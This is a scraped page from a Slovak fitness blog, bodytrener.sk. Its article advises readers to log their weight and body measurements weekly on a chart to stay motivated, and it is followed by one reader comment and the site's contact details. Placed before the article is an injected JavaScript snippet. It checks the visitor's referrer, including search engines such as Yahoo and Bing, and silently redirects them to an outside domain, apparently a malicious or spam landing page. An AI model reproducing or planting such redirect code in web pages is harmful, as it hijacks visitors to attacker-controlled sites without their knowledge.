var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Ako napredovať? | www.bodytrener.sk
Blog
...naučte sa niečo nové!

Ako napredovať?

1254880_72709589Mnoho ľudí sa stále snaží cvičiť, jesť poriadne, ale po pár dňoch to vzdajú. Vykašlú sa na všetko a zanevrú na akýkoľvek šport. Ďalší ľudia si dajú cieľ, ktorí nie je možné splniť. Napríklad schudnúť 10kg a pribrať 5kg čistej svalovej hmoty za týždeň. Potom zase zanevrú na šport, cvičenie a len nadávajú, že nič nepomáha a každý užíva steroidy.

Toto sú klasické veci, ktoré trápia mnoho ľudí a prečo zo všetkým končia. Možno ste to práve vy, ktorí sú nespokojní a chcú s tým niečo urobiť. V tomto článku Vám poradíme ako neprestať a ďalej postupovať vpred.

Musíme si zohnať 4 základné veci: váha, pero, papier a meter. Tieto 4 veci nám dopomôžu stále napredovať a neskončiť.

A ?o teraz?

Zoberte si papier a pero. Na každý riadok napíšte svoju váhu a obvod partií.

Napr.

 Týždne 1.týž 2.týž  3.týž 4.týž 5.týž 6.týž 7.týž 8.týž
Váha
Prsia
Brucho
Biceps
Stehná
Lýtka

 

Toto bude teraz Vaša cvičiaca biblia podľa ktorej sa budete riadiť. Každý týždeň sa znova odvážite a všetko premeriate. Budete vidieť Vaše zmeny a to Vás bude hnať dopredu. Možno tam uvidíte aj Vaše nedostatky, že pri chudnutí Vám brucho nechce ísť dole tak zrejme robíte niečo zle pri strave alebo cvičení. Odporúčam si toto prilepiť niekde na chladničku, do pracovne, roboty alebo izby. Aby ste to máli stále na očiach a mohli stále nad tým rozmýšľať ako sa zlepšiť, čo zmeniť atď.
Možno si poviete, že je to debilina, ale odporúčam Vám to najskôr vyskúšať a potom vyjadrite svoj názor. Ide o to aby ste vydržali. Niečo podobné si môžete urobiť aj ku strave a tréningu. Spravíte si tabuľku tréningu a len si odfajknete či ste boli cvičiť, či ste všetko odcvičili alebo či ste boli behať a koľko ste odbehli kilometrov za koľko minút. Prípadne aj počet kalórii, ktoré ste spáli pri behu na páse alebo stacionárnom bicykli.   Navoľte si nejaký jedálniček a podľa neho si odškrkávajte či ste zjedli čo ste mali. Prípadne, ak ste zhrešili a niečo nedodržali ako sa to prejavilo na váhe atď. Je to taká menšia štatistika a spoznávačka Vášho tela. Ak sa Vám tento článok páčil, budeme vďačný za like a už o pár týždňov budeme vydávať online knihu, ktorú si budete môcť u nás kúpiť s radami a zaujímavými článkami o regenerácii, cvičení, strave atď.

Váš tím bodytrener.sk

Diskusia (1)

    • masaker211
    • 10. Január 2014 o 15:01

    Dobrý deň mám 14 rokov a chcem sa spýtať ako správne cvičit aby mi zmizol tuk mam ho 33,5% ale mam jeden problem že mám štitnu žlazu a napriklad keď niečo zjem tak sa mi to hneď uklada do tuku za odpoveď Ďakujem

    Odpovedať

Pridať komentár




Odber noviniek

Pridajte sa k odberu noviniek a získajte najnovšie informácie o článkoch, zľavách a súťažiach.

Potrebujete pomoc?

Adresa:
Bodytrener.sk
Pažite 5
010 09 Žilina

Pracovná doba:
Pondelok – Piatok
10:00 – 18:00

E-mail: info@bodytrener.sk
Telefón: +421 904 569 865

Bankové účty:
2200359578/8330 - SLOVENSKO
2900359579/2010 - ČESKO

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku